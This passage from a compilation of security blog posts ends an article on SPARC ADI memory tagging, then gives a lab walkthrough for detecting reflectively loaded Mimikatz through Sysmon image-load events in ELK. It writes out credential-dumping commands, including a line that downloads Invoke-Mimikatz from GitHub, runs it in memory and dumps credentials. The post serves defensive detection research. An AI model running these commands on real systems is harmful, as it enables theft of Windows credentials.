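The statistical use-after-realloc mitigation (rotate through different versions for the same slot) boils down to picking a fresh tag that differs from the one the stale reference still carries. A minimal sketch, with an illustrative helper not taken from any real allocator:

```c
#include <assert.h>
#include <stdlib.h>

/* On reallocation of a slot, pick a random tag in [0, ntags) that
 * differs from old_tag, so a dangling tagged pointer faults with
 * probability (ntags - 1) / ntags. Requires ntags >= 2. */
static unsigned rotate_tag(unsigned old_tag, unsigned ntags)
{
    /* draw from ntags - 1 candidates, then skip over old_tag */
    unsigned t = (unsigned)rand() % (ntags - 1);
    return (t >= old_tag) ? t + 1 : t;
}
```

With only a 4-bit version space, a determined attacker can brute-force this, which is why the article qualifies it as statistical noise rather than an invariant.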
In both cases, infoleaks would precisely guide the attacker, but this is basically a given for pretty much any statistical defense.

TL;DR

Oracle SPARC M7 processors come with ADI, Application Data Integrity, a feature that provides memory tagging. Memory allocators can take advantage of it both for debugging and security, in order to invariantly detect linear buffer overflows and statistically mitigate use-after-free and offset-based arbitrary writes.

lazytyped at 9:35 AM

Source: https://lazytyped.blogspot.ro/2016/12/hardening-allocators-with-adi.html?m=1
  18. Saturday, March 11, 2017

Chronicles of a Threat Hunter: Hunting for In-Memory Mimikatz with Sysmon and ELK - Part I (Event ID 7)

This post marks the beginning of the "Chronicles of a Threat Hunter" series, where I will be sharing my own research on how to develop hunting techniques. I will use open source tools and my own lab at home to test real-world attack scenarios. In this first post, I will show you the beginning of some research I have been doing recently with Sysmon in order to hunt for when Mimikatz is reflectively loaded in memory. This technique is used to dump credentials without writing the Mimikatz binary to disk.

Invoke-Mimikatz.ps1 Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin Delpy 'gentilkiwi', Twitter: @gentilkiwi

This first part will cover how we could approach the detection of in-memory Mimikatz by focusing on the specific Windows DLLs that it needs to load in order to work (no matter what process it is running from and whether it touches disk or not). I will compare the results when Mimikatz is run on disk and in memory to see the specific DLLs needed in both scenarios. There is an article that talks about this same approach, but I feel that it could be improved upon. It is still a good read, and I love the approach. You can read it here.

Requirements:

Sysmon installed (I have version 6 installed)
Winlogbeat forwarding logs to an ELK server (I recommend reading my series "Setting up a Pentesting.. I mean, a Threat Hunting Lab", especially parts 5 & 6, to help you set up your environment)
Mimikatz binary (Version 2.1 20170305)
Invoke-Mimikatz
notepad++ - Great local editor for your Sysmon configs.

Mimikatz Overview

Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept).
There are two optional components that provide additional features: mimidrv (a driver to interact with the Windows kernel) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested) [Source]. Mimikatz comes in two flavors, x64 or Win32, depending on your Windows version (32/64 bits). The Win32 flavor cannot access 64-bit process memory (like lsass), but can open 32-bit minidumps under 64-bit Windows. It's now well known to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden Tickets. [Source]

In-Memory Mimikatz

What gives Invoke-Mimikatz its "magic" is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory [Source]. However, it needs other native Windows DLLs loaded from disk in order to do its job.

Event ID 7: Image loaded

The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be configured with the –l option. It indicates the process in which the module is loaded, hashes and signature information. The signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event should be configured carefully, as monitoring all image load events will generate a large number of events. [Source]

Getting ready to hunt for Mimikatz

Getting a Sysmon config ready

The main goal is to monitor for "Images Loaded" when Mimikatz gets executed. However, first we have to make sure that we understand what "normal" looks like. Therefore, the first thing that I recommend doing is to monitor images getting loaded by the process which will be executing Mimikatz in its two forms (the Mimikatz binary and Invoke-Mimikatz).
We will test Mimikatz on disk first. This first step of logging images loaded by the process executing Mimikatz will be more helpful when we test the Invoke-Mimikatz script, but it is a good exercise for you to understand the testing methodology. The process that I used for this first test was "PowerShell.exe", so I created a basic Sysmon configuration to only log images loaded by this process. It is available on GitHub as shown below.

<Sysmon schemaversion="3.30">
  <!-- Capture all hashes -->
  <HashAlgorithms>md5</HashAlgorithms>
  <EventFiltering>
    <!-- Event ID 1 == Process Creation. -->
    <ProcessCreate onmatch="include"/>
    <!-- Event ID 2 == File Creation Time. -->
    <FileCreateTime onmatch="include"/>
    <!-- Event ID 3 == Network Connection. -->
    <NetworkConnect onmatch="include"/>
    <!-- Event ID 5 == Process Terminated. -->
    <ProcessTerminate onmatch="include"/>
    <!-- Event ID 6 == Driver Loaded. -->
    <DriverLoad onmatch="include"/>
    <!-- Event ID 7 == Image Loaded. -->
    <ImageLoad onmatch="include">
      <Image condition="end with">powershell.exe</Image>
    </ImageLoad>
    <!-- Event ID 8 == CreateRemoteThread. -->
    <CreateRemoteThread onmatch="include"/>
    <!-- Event ID 9 == RawAccessRead. -->
    <RawAccessRead onmatch="include"/>
    <!-- Event ID 10 == ProcessAccess. -->
    <ProcessAccess onmatch="include"/>
    <!-- Event ID 11 == FileCreate. -->
    <FileCreate onmatch="include"/>
    <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. -->
    <RegistryEvent onmatch="include"/>
    <!-- Event ID 15 == FileStream Created. -->
    <FileCreateStreamHash onmatch="include"/>
    <!-- Event ID 17 == PipeEvent. -->
    <PipeEvent onmatch="include"/>
  </EventFiltering>
</Sysmon>

PowerShell_ImagesLoaded.xml, hosted on GitHub

Download and save the Sysmon config in a preferred location of your choice as shown in Figure 1 below.

Figure 1. Saving custom Sysmon config.

Update your Sysmon rules configuration.
In order to do this, make sure you run cmd.exe as administrator, and use the configuration you just downloaded as shown in figure 3 below. Run the following command:

Sysmon.exe -c [Sysmon config xml file]

Then, confirm that your new config is running by typing the following:

sysmon.exe -c

(You will notice that the only thing being logged will be images loaded by "PowerShell", as shown in figure 3 below.)

Figure 2. Running cmd.exe as an Administrator.
Figure 3. Updating your Sysmon rules configuration.

You should be able to open your Event Viewer and verify that the last event logged by Sysmon was Event ID 16, which means that your Sysmon config state changed. You should not get any other events after that unless you launch PowerShell. If you do, try to update your config one more time as shown in figure 3 above.

Figure 4. Checking Sysmon logs with the Event Viewer console.

Delete/Clean your Index

If you open your Kibana console and filter your view to show only Sysmon logs, you will see old records that were sent to your ELK server before updating your Sysmon config. In order to be safe and make sure you don't have old images loaded that might interfere with your results, I recommend deleting/clearing your index by running the following command as shown in figure 6 below:

curl -XDELETE 'localhost:9200/[name of your index]?pretty'

If you are using my Logstash configs, an index gets created as soon as data is passed to your Elasticsearch.

Figure 5. Old Sysmon logs displayed on your Kibana console.
Figure 6. Clearing contents of your main Index. (Clearing Logs)

Now, if you refresh your view (filtering only to show Sysmon logs again), you should not see anything unless you execute PowerShell.

Figure 7. No Sysmon logs in Elasticsearch yet.

Create a Visualization for "ImageLoaded" events

I do this so that I can group events and visualize data properly instead of using the Event Viewer.
To get started, do the following:

Click on "Visualize" on the left panel
Select "Data Table" as your visualization type

Figure 8. Creating a new visualization. Data Table type.

Select the index you want to use (in this case, the only one available is Winlogbeat)

Figure 9. Selecting the right index for the visualization.

As shown in figure 10 below:

Select the "Split Rows" bucket type
Select the aggregation type "Terms"
Select the data field for the visualization (event_data.ImageLoaded.keyword)
By default, data will be ordered "Descending". Set the number of records to show to "200" (we do this to make sure we show all the modules being loaded)

Figure 10. Creating visualization.

Click on "Options" and set the "Per Page" value to show 20 results per page. Remember we set this visualization to show the top 200 records in figure 10 above, and now to show 20 records per page. If you end up having 10 pages full of records, then you might want to increase the number of records beyond 200, since you might not be showing all the results.

Figure 11. Setting visualization options.

Give a name to your new visualization and save it.

Figure 12. Saving visualization.
Figure 13. Saving visualization.

Creating a simple dashboard to add our visualization

To get started, do the following:

Click on "Dashboard" on the left panel. (Figure 14)
Click on "Add" in the options above your Kibana search bar. (Figure 15)

Figure 14. Creating a new dashboard.

Select the visualization we just created for images loaded. This will add the visualization to your dashboard.

Figure 15. Adding our new visualization.
Figure 16. Visualization added to our new dashboard.

Save your new dashboard: click on "Save" between the options "Add" and "Open", then give your dashboard a name and save it.

Figure 17. Saving new dashboard.
Figure 18. Saving new dashboard.

Testing/Logging images loaded by PowerShell

As I stated before, if we want to detect anomalies, we have to first understand what normal looks like.
Therefore, in this section, we will find out what images get loaded when PowerShell is launched in order to start creating a baseline. To get started, launch PowerShell and close it.

Figure 19. Opening PowerShell.

Next, refresh your dashboard by clicking on the magnifying glass icon located to the right of the Kibana search bar. You will see that there are several images/modules that were loaded when PowerShell executed, as shown in figure 20 below.

Figure 20. Logging images loaded by PowerShell.

If we go to our last page, page #4, we can see that there are 12 results on a 20-per-page setup. This means that we have 3 pages with 20 records and 1 with 12. Therefore, we can say that PowerShell loads 72 images when we open and close it.

Figure 21. Logging images loaded by PowerShell.

Now, in order to verify that PowerShell loads 72 images most of the time, I opened and closed PowerShell 4 times as shown in figure 22 below.

Figure 22. Opening and closing PowerShell 4 times.

Once you refresh your dashboard again, you will see that we have the same images being loaded and the number (count) of images increased by 4. We now see a count of 5 for every single unique image loaded, for a total again of 72 unique images loaded 5 times. Up to this point, it is clear that PowerShell only loads 72 images when it starts with its basic (default) functionality. We are now ready to test Mimikatz on disk.

Figure 23. Images loaded by PowerShell after being opened and closed 4 more times.
Figure 24. Images loaded by PowerShell after being opened and closed 4 more times.

Detecting Mimikatz on Disk

Download the latest Mimikatz trunk

Our first test will be running the Mimikatz binary available here, as shown in figure 25.

Figure 25. Downloading Mimikatz binaries.

Download and save your Mimikatz folder in a preferred location of your choice as shown in figure 26 below. I show you this because it is important that you remember the right path of the Mimikatz binary you will use for the first test.
We will need the path to update our Sysmon config and log the images loaded by the Mimikatz binary.

Figure 26. Downloading Mimikatz binaries.

Edit and update your Sysmon config

Add another rule to the configuration we used earlier. Open the config with notepad++ and add another "Image" rule specifying the path to mimikatz.exe as shown in figure 28.

Figure 27. Editing our Sysmon config.
Figure 28. Editing our Sysmon config.

Open cmd.exe as administrator and run the following command as shown in figure 29 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command:

sysmon.exe -c

(You will see that our new rule now shows up below our PowerShell one.)

Figure 29. Updating Sysmon rule configuration.

TIP: Extend the time range of your dashboard

Remember that by default your dashboard is set to show the last 15 minutes of data stored in Elasticsearch. I always extend my time range to 15 or 30 minutes to make sure I still show logs that were captured more than 15 minutes ago (that is sometimes how much time it takes me to do all the extra stuff to get ready, or I just simply get distracted). It depends on how much time you take between each update or change you make to your config or strategy. You just want to make sure that your time range is right in order to capture all your results.

Figure 30. Extending the time range of your dashboard.

Running Mimikatz on disk

Now that we have everything ready, let's first run PowerShell as administrator. If you refresh your dashboard, the count of almost every single image/module will be increased by 1 as shown in figure 32 below.

Figure 31. Running PowerShell as Administrator.
Figure 32. PowerShell opened as Administrator.

Now, it is really important to make sure we do not load extra images that could be mixed with modules loaded by the Mimikatz binary. Before running Mimikatz, I wanted to show you what happens when you fat-finger a command in PowerShell.
Yes, it actually loads an image named diasymreader.dll, as shown in figure 34 below. Therefore, if you fat-finger the wrong arguments while executing Mimikatz, make sure you do not count diasymreader.dll as part of your results.

Figure 33. Testing wrong arguments in PowerShell.

One important thing to mention is that PowerShell loads netutils.dll when the console closes. Therefore, since we are not closing our PowerShell console yet, you will still see netutils.dll with a count of 5 and not 6. We are using our high-integrity PowerShell process to run Mimikatz, so we can't close it yet.

Figure 34. Extra image loaded by PowerShell after executing wrong arguments.

It is time to test our Mimikatz binary. Change your directory to the one where the Mimikatz binary is stored (I used the x64 one). Launch the following commands and close your PowerShell console:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Figure 35. Running Mimikatz on disk.

Next, refresh your dashboard. You will see that our count for every single image on page 1 increased by 1. That means that Mimikatz also loads those images when it executes. This is an important first finding, because those first images might not be unique enough to be used to fingerprint Mimikatz.

Figure 36. Images loaded after executing Mimikatz on disk.

If you go to page #4, you will see that we start to see a few unique ones loaded by Mimikatz (remember that diasymreader.dll was not loaded by Mimikatz). Also, you can see that the image mimikatz.exe was loaded 4 times, and by PowerShell of course.

Figure 37. Images loaded after executing Mimikatz on disk.

If you go to the next page, page #5, you can see the last unique images loaded by Mimikatz. This is good for this exercise, because we can at least have a basic understanding of the, so far, unique images being loaded by Mimikatz when executed on disk.

Figure 38. Images loaded after executing Mimikatz on disk.

What if I want to see images loaded by Mimikatz only?
What I like about using Kibana is that I can filter out or group data records with unique characteristics. Let's say you want to select only images loaded by mimikatz.exe. We will have to create an extra visualization and add it to our dashboard. You could also type a query in the Kibana search bar to accomplish that, but I prefer to have an extra visualization that I can interact with too (good exercise). As explained before, in order to create a visualization, click on Visualize on the left panel, and it will automatically take you to edit the only visualization that we have in our dashboard. Next, click on "New" to create a new visualization as shown in figure 39 below.

Figure 39. Creating a new visualization.

Select Data Table for the visualization type and Winlogbeat for the index.

Figure 40. Creating a new visualization.

For this visualization, do the following:

Set the field to event_data.Image.keyword
Give it a name and save it

Figure 41. Creating a new visualization.
Figure 42. Saving the new visualization.

Click on Dashboard on the left console, and add the new visualization to your dashboard as shown in figure 43 below.

Figure 43. Adding visualization to dashboard.

You will see that now we have better numbers to show per image (PowerShell.exe & mimikatz.exe). You can see that PowerShell loaded 437 images overall. That makes sense because we know that it loads 72 images every time it opens and closes, and we used it 6 times, which gives us 432 images. We also made PowerShell load one extra image when I showed you what happens when you fat-finger a command, so with that one we would have 433. Add the other 4 images named mimikatz.exe that were loaded when we used PowerShell to execute the Mimikatz binary, and all that gives us our 437 images loaded as shown in figure 44.

Figure 44. New visualization added to dashboard.
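The arithmetic above can be sanity-checked with a quick calculation; these are simply the numbers from this walkthrough, nothing universal.

```c
#include <assert.h>

/* Reproduce the count from figure 44: 72 default image loads per
 * PowerShell open/close, 6 sessions so far, 1 diasymreader.dll from
 * the mistyped command, and 4 mimikatz.exe image loads. */
static int powershell_image_total(void)
{
    int per_session    = 72;
    int sessions       = 6;
    int fat_finger     = 1;
    int mimikatz_loads = 4;
    return per_session * sessions + fat_finger + mimikatz_loads;
}
```

If your own baseline count per session differs, the same breakdown still tells you whether the dashboard total is fully accounted for.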
Then, what you can do with this new visualization is click on the image "C:\Tools\mimikatz_trunk\x64\mimikatz.exe", and it will automatically create a filter to show only the images loaded by your selection as shown in figure 46 below.

Figure 45. Images loaded only by PowerShell and Mimikatz.
Figure 46. Images loaded only by Mimikatz.
Figure 47. Images loaded only by Mimikatz.

You can also download all the results of the Images_Loaded visualization by clicking on the option "Formatted" below the data table results. That will allow you to export all the results in CSV format. Save it and open it to highlight a few things.

Figure 48. Exporting results of images loaded in a CSV format.
Figure 49. Saving CSV file.

Open the file and highlight the unique images that were loaded by Mimikatz when it was run on disk. That will help you to document your results. So far, we can consider the highlighted images to be our initial fingerprint for Mimikatz. That will change, of course, when you start collecting modules being loaded by other programs and comparing results.

Figure 50. Result of images loaded after executing Mimikatz on disk.

Detecting In-Memory Mimikatz

Delete/Clean your Index

Our next test will be launching Mimikatz reflectively in memory. To get started, delete/clear your index as shown in figure 51 below.

Figure 51. Deleting Index.

Refresh your dashboard to confirm that the index was deleted/cleared.

Figure 52. Empty Dashboard.

Getting ready to run Invoke-Mimikatz

Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL-encoded elements (32-bit & 64-bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it's not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. [Source]

Figure 53. Empire's latest Invoke-Mimikatz script.
Figure 54. Empire's latest Invoke-Mimikatz script.
As shown before in figure 22, when we were getting ready to run the Mimikatz binary, we want to make sure that we have a basic baseline of images/modules being loaded by PowerShell when it is opened and closed. Open and close PowerShell 4 times as shown in figure 55 below.

Figure 55. Opening and closing PowerShell 4 times.

We can see the same 72 images being loaded 4 times. It should show a total of 288, but there might have been a delay making it to the server. I probably refreshed my dashboard too soon and did not capture the last netutils.dll load, which happens when PowerShell exits. Anyway, I think that we have a good basic baseline before running Mimikatz reflectively in the same PowerShell process.

Figure 56. Images loaded by PowerShell before running Mimikatz.

Baselining how PowerShell will download Invoke-Mimikatz

The easiest way to test Invoke-Mimikatz is by going to its GitHub repo and downloading it before executing it in memory. We have to make sure that we understand what extra images PowerShell needs to load in order to perform network operations and download Invoke-Mimikatz as a string. We can use the same approach of opening and closing PowerShell and running only the commands that will pull the script as a string from GitHub without executing it yet, as shown in figure 57 below.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

Figure 57. Running commands to only download Invoke-Mimikatz.

Next, refresh your dashboard and, as you already know, you will have most of the unique image counts increased by one as shown in figure 58 below.

Figure 58. Checking initial images loaded by PowerShell to download Invoke-Mimikatz from GitHub.

Now, if you go to page #4, you will start to see new unique images/modules. Those are images loaded by PowerShell to perform the "DownloadString" operation.
You can go to page #5 too, as shown in figure 60, and you will see more unique images. (You can expand your first visualization to see the long paths of a few images. The second visualization we added to the dashboard earlier will just move down.)

Figure 59. Unique images loaded by PowerShell to download Invoke-Mimikatz from GitHub.
Figure 60. More unique images loaded by PowerShell to download Invoke-Mimikatz from GitHub.

Then, we can perform the same operation (downloading Invoke-Mimikatz from GitHub as a string) to make sure we have a strong fingerprint for that particular action and avoid mixing it with images loaded when Mimikatz is executed in memory. I opened PowerShell three times, executed the same commands to only download Invoke-Mimikatz as a string, and closed them all as shown in figure 61.

Figure 61. Downloading Invoke-Mimikatz as a string three times.

Then, you will see that the counts for the initial images loaded by PowerShell were increased by 3, but if you go to page #5 as shown in figure 63, you can see our "DownloadString" images loaded 4 times.

Figure 62. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.
Figure 63. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.

Running Mimikatz in Memory

To get started, run PowerShell as administrator.

Figure 64. Running PowerShell as Administrator.

In order to download Invoke-Mimikatz as a string from GitHub and run it in memory, type the following commands:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Figure 65. Running Mimikatz in memory.

You will of course get the same results as when it was run on disk. Close your PowerShell console.

Figure 66. Results from running Mimikatz.
Analyzing In-Memory Mimikatz Results

After closing PowerShell, refresh your dashboard (make sure you have the right Time Range), and you will see that our initial default images loaded by PowerShell increased by only 1, and not by 2 as when we ran Mimikatz on disk. This is because the Mimikatz binary is run reflectively inside of PowerShell, and several of the modules needed are already loaded by PowerShell itself.

Figure 67. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

Next, if you go to page #5, you will see that the images loaded during the "DownloadString" operation increased by one (a count of 5 now, as expected). In addition, we can see one of the images that was also loaded while executing Mimikatz on disk:

C:\Windows\System32\WinSCard.dll

However, there are four new images that were loaded when Mimikatz was executed reflectively in memory. (I will explain later why those get loaded when we run Invoke-Mimikatz.)

C:\Windows\System32\whoami.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll
C:\Windows\System32\NapiNSP.dll
C:\Windows\System32\RpcRtRemote.dll

Figure 68. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

On page #6, we can also see a few new images that we did not see when Mimikatz ran on disk. (I will explain later why those get loaded when we run Invoke-Mimikatz.)

C:\Windows\System32\nlaapi.dll
C:\Windows\System32\ntdsapi.dll
C:\Windows\System32\pnrpnsp.dll
C:\Windows\System32\wbem\fastprox.dll
C:\Windows\System32\wbem\wbemprox.dll
C:\Windows\System32\wbem\wbemsvc.dll
C:\Windows\System32\wbem\wmiutils.dll
C:\Windows\System32\wbemcomn.dll
C:\Windows\System32\winrnr.dll

However, we can also see almost all of the rest of the images that were loaded when Mimikatz was executed on disk.
C:\Windows\System32\apphelp.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\logoncli.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll
C:\Windows\System32\wintrust.dll
C:\Windows\System32\wkscli.dll

I don't see the following modules (loaded by Mimikatz on disk) as unique ones anymore (count 1). This is because they are used to handle encryption and were part of the "DownloadString" operation baselining. We handled encrypted traffic with GitHub, so it makes sense. It is safe to say that those modules will be noisy. (It does not mean that they do not get loaded while running Mimikatz in memory; it is just that PowerShell loads them first to handle the encrypted traffic.)

C:\Windows\System32\bcrypt.dll
C:\Windows\System32\bcryptprimitives.dll
C:\Windows\System32\ncrypt.dll

Figure 69. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

You can reduce the width of the first visualization, and the second one that we added earlier should move back up next to the first one. This is just so that you can see the total number of images loaded by PowerShell at the end of this test.

Figure 70. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

In order to document your findings, export the results to a CSV file by clicking on the option "Formatted" below the "Images_Loaded" results, and save it to your computer as shown in figure 71.

Figure 71. Exporting results to a CSV file.

Comparing Results

As we can see in figure 72 below, it does not matter if Mimikatz is executed on disk or in memory; it still loads the same extra modules it needs in order to work. Most of the modules that Mimikatz needs are already loaded by PowerShell, depending on what happens before running the script, but we can still see a few unique ones that could allow us to create a basic fingerprint for in-memory Mimikatz.
For example, if we take out the 3 modules used for encryption, we can use the other 10 to create a basic detection rule. We could hunt by grouping the following modules being loaded within a one- to four-second time bucket.

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\apphelp.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\logoncli.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll
C:\Windows\System32\wintrust.dll
C:\Windows\System32\wkscli.dll

Figure 72. Comparing results on-disk and in-memory.

What about whoami.exe? We could add that to our basic in-memory Mimikatz fingerprint. If an adversary is using the exact Invoke-Mimikatz script from the Empire Project, then it will reduce the number of false positives. The whoami part is defined in the main function of Invoke-Mimikatz, as you can see in figure 73 below. It is important to note that Invoke-Mimikatz from PowerSploit does not have this command in the script.

Figure 73. Whoami utilized in Invoke-Mimikatz.

What about the modules loaded from the wbem directory and WMINet_Utils? All of that is part of the Windows Management Instrumentation (WMI) technology. It provides access to monitor, command, and control any managed object through a common, unifying set of interfaces, regardless of the underlying instrumentation mechanism. WMI is an access mechanism. [Source]

But why do they get loaded when we run Mimikatz in memory? It is because of a simple command used in the Invoke-Mimikatz script to verify that the PowerShell architecture (32-bit/64-bit) matches the OS architecture. Most of the modules in question were pointing to WMI activity, so I just accessed the code and looked for any signs of WMI. Invoke-Mimikatz uses the command "Get-WmiObject" and the class "Win32_Processor" to find out information about the CPU and to get the "AddressWidth" value, which is used to verify the OS architecture, as shown in figure 74 below.

Figure 74.
WMI in Invoke-Mimikatz.

So I tested that command on my computer and logged all the modules being loaded by PowerShell. I refreshed my dashboard and saw that all the modules in question were loaded while executing the following command:

get-wmiobject -class Win32_Processor

Figure 75. Executing get-wmiobject with class Win32_Processor to get information about the CPU.

Figure 76. Images loaded after using WMI.

I want to point out that the following modules can generate a lot of false positives, since they can be triggered by simple Office applications (x86/x64) and the use of Internet browsers such as Internet Explorer, as shown in figure 77 below:

C:\Windows\System32\nlaapi.dll
C:\Windows\System32\ntdsapi.dll

Figure 77. Images loaded after using WMI.

In addition, in my opinion, depending on how much WMI is used in your environment, it might be a good idea to start monitoring for at least:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll

You can test that in your environment and see how noisy it can get. Log for WMINet_Utils.dll in the .NET versions available in your gold image.
On the other hand, most of the rest of the modules are loaded by several third-party and built-in applications, so they are too noisy and could cause a large number of false positives:

C:\Windows\System32\nlaapi.dll
C:\Windows\System32\ntdsapi.dll
C:\Windows\System32\pnrpnsp.dll
C:\Windows\System32\wbem\fastprox.dll
C:\Windows\System32\wbem\wbemprox.dll
C:\Windows\System32\wbem\wbemsvc.dll
C:\Windows\System32\wbem\wmiutils.dll
C:\Windows\System32\wbemcomn.dll
C:\Windows\System32\winrnr.dll

So far, our detection strategy is still to look for the following 10 modules:

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\apphelp.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\logoncli.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll
C:\Windows\System32\wintrust.dll
C:\Windows\System32\wkscli.dll

How can we test our group of modules and tune it to reduce false positives? Before thinking about deploying a detection rule like this to your Sysmon config in production, I highly recommend getting a gold image and logging every single module loaded by every process or application on the system. I tested this in my own environment at home.

Edit and Update your Sysmon config

Open the Sysmon configuration we used for our initial tests and set it to not exclude anything from Event ID 7 - Image Load (log everything), as shown in figure 79 below.

Figure 78. Editing current sysmon config.

Figure 79. Editing current sysmon config.

Open cmd.exe as administrator and run the following command, as shown in figure 80 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command (you will see that now everything for ImageLoad is being logged):

sysmon.exe -c

Figure 80. Updating Rule configurations.

Open several applications

We are now logging every single image loaded on our system on top of our Invoke-Mimikatz findings (DO NOT DELETE/CLEAR YOUR INDEX).
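For reference, the "log everything" change described above comes down to an ImageLoad rule that excludes nothing. A minimal sketch of such a Sysmon configuration might look like the following; the schemaversion value is an example and must match the Sysmon version you are actually running:

```xml
<!-- Minimal sketch: schemaversion is an example value -->
<Sysmon schemaversion="3.40">
  <EventFiltering>
    <!-- onmatch="exclude" with no rules inside = exclude nothing = log every Event ID 7 image load -->
    <ImageLoad onmatch="exclude"></ImageLoad>
  </EventFiltering>
</Sysmon>
```

Be warned that logging every image load is extremely verbose; this is only meant for baselining on a gold image, as described above.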
We can now open and close applications that a user most likely uses in an organization (depending on the type of job), as shown in figure 81.

Figure 81. Open applications on your testing machine.

Make sure that you also have the right Time Range assigned to your dashboard, since we are still using the logs we gathered from when we ran Invoke-Mimikatz. I set mine to Last 1 hour, as shown in figure 82.

Figure 82. Adjusting Time Range.

Refresh your dashboard and you will see a lot of modules being loaded, as shown in figure 83 below. You can adjust your visualizations if you want to. That will allow you to see more than 200 images being loaded on your box (that is how many records we set our Images_Loaded visualization to show).

Figure 83. Several images being loaded.

Hunt for the group of 10 modules

Next, with all that data, we can query for the 10 modules of our initial in-memory Mimikatz fingerprint, as shown in figures 84 and 85 below.

"WinSCard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll", "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll", "wintrust.dll", "wkscli.dll"

You will see that 5 out of the 10 modules are still unique to our basic fingerprint (most of them are used to manage authentication security components and features of the system), as shown in figure 84 below.

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll

You might be wondering: why not netapi32.dll? It was actually loaded 2 more times. That does not mean that netapi32.dll is not a common binary needed for authentication support; however, since it seems to be used by a few other applications, I'd rather filter that one out.

Figure 84. Querying for only In-memory Mimikatz fingerprint.
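As a sketch, the fingerprint query shown in figures 84 and 85 could be expressed in Kibana's query bar roughly as follows. Note the field names (event_id, event_data.ImageLoaded) are assumptions that depend on how your Winlogbeat/Logstash pipeline maps Sysmon fields; adjust them to your own index mapping:

```
event_id:7 AND event_data.ImageLoaded:("WinSCard.dll" OR "apphelp.dll" OR "cryptdll.dll"
  OR "hid.dll" OR "logoncli.dll" OR "netapi32.dll" OR "samlib.dll" OR "vaultcli.dll"
  OR "wintrust.dll" OR "wkscli.dll")
```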
If you want to know what modules/images are being loaded by a specific Image on the EventID7_Images visualization, click on one of them and a filter will be created to show you only the images loaded related to your selection. For example, Excel apparently loads apphelp.dll and wintrust.dll from our list of 10, as shown in figure 85 below.

Figure 85. What is loading what?

Or, vice versa, you can click on the loaded image and it will filter everything out to show you the Images that loaded that specific module, as shown in figure 86.

Figure 86. What is loading what?

What about other operations where authentication components are involved? I cleaned/deleted my index and started paying attention to authentication operations, such as logging onto web applications or onto my computer after rebooting it.

Logging onto the Kibana Web Interface

I opened IE, and the first two modules out of the 10 that get loaded are wintrust.dll and apphelp.dll. Then, I browsed to my ELK's IP address and got a prompt to enter my credentials. I noticed that for IE to do all this, it needed to load 5 out of the 10 modules needed by Mimikatz as well, as shown in figure 87 below. 3 out of those 5 are still part of the ones required for authentication support.

samlib.dll
WinSCard.dll
vaultcli.dll

Figure 87. Images loaded by IE while authenticating to Kibana.

Logging onto my system after rebooting it

The processes shown in figure 88 below are the first processes that get started when a system boots up. (The ones with the grayed icons are processes that have already exited.)

Figure 88. Images loaded by the first processes that get started by your system when it boots up.

So what happens when we look for the 5 modules that so far are considered the combination with the fewest false positives against the processes shown in figure 88?
"WinSCard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll"

As you can see below in figure 89, there were hits for all of them, but only from processes involved in authentication. The one with the most hits was "LogonUI.exe".

Figure 89. "Credential Providers" modules used by a few processes.

When conducting research on that particular process (LogonUI.exe) for a training class I put together for some colleagues, I found out the following:

"Whenever a user hits Ctrl-Alt-Del, winlogon.exe switches to another desktop and launches a special program, logonui.exe, to interact with the user. The user may be logging on initially, (un)locking the desktop, changing her password or some other task, but the user is interacting with logonui.exe on a special desktop, not winlogon.exe on the default desktop. When authenticating, logonui.exe loads DLLs called "credential providers" which can handle the password, smart card or, with a third-party provider, biometric information, to authenticate against the local SAM database, Active Directory, or some other third-party authentication service." [Source]

